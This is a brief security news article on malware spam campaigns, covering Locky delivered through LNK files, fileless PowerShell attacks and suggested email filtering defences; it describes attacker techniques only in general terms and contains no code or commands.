Cybercriminals Switch File Types to Infect More Organizations with Malware
During the past year, spam volume increased considerably, as did the percentage of those emails that were malicious. The increase in malicious messages coincided with increased botnet activity. Botnets are now being used to send large-scale malware and ransomware campaigns. While spam email delivery of malware may have fallen out of favor in recent years, that is clearly no longer the case.
Microsoft’s Malware Protection Center has identified one campaign that uses LNK files which attempts to download Locky from five different domains. “The use of multiple domains and the technique of storing the rest of the URL as a parameter is a way to circumvent URL filtering solutions. All the script needs is one URL that is not blocked in order to successfully download malware,” warns Microsoft.
Not all campaigns are used to download malicious files. Fileless malware is becoming more popular. Since PowerShell scripts are run directly in the memory, no file download is necessary. Malicious code remains in the memory. Even if endpoint security has been implemented, those solutions are unlikely to detect these fileless malware attacks.
Organizations can improve defenses against these fileless malware attacks by setting PowerShell policies to restricted, but is a relatively easy process to bypass these security policies and still run the scripts.
SCG files are more commonly used, although organizations should consider also blocking these image types from delivery via email. If images do need to be sent, polices can be developed to require these file types to be communicated via other means, via Google Drive or Dropbox for example.